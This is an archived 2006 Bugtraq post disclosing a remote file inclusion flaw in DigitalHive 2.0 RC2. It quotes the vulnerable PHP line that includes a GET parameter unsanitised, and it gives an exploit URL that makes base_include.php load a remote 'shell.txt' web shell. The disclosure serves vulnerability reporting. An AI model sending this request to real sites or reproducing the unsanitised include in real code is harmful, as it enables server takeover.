[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DigitalHive 2.0 RC2 (base_include.php)File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DigitalHive 2.0 RC2 (base_include.php)File Include
From: "mahmood ali" <mah_k_2000@xxxxxxxxxxx>
Date: Wed, 18 Oct 2006 23:53:51 +0000

###################################
DigitalHive 2.0 RC2 (base_include.php)File Include
###################################

Source Code:
http://www.comscripts.com/jump.php?action=script&id=1502
###################################

Vulnerable Code:_
include ($_GET["page"]);
###################################

Exploit :
http://www.vicTim.com/[Path]/template/purpletech/base_include.php?page=shell.txt?
###################################

Discoverd By :  Mahmood_ali
Conatact :      mah_k_2000@xxxxxxxxxxx
###################################

Special Greetings :_  Tryag-Team
###################################

_________________________________________________________________

Windows Live? Messenger has arrived. Click here to download it for free!http://imagine-msn.com/messenger/launch80/?locale=en-gb

Prev by Date: Re: phpAdsNew include bug!
Next by Date: UltraCMS 0.9 sql injection
Previous by thread: [DRUPAL-SA-2006-026] Drupal 4.6.10 / 4.7.4 fixes HTML attribute injection issue
Next by thread: UltraCMS 0.9 sql injection
Index(es):
- Date
- Thread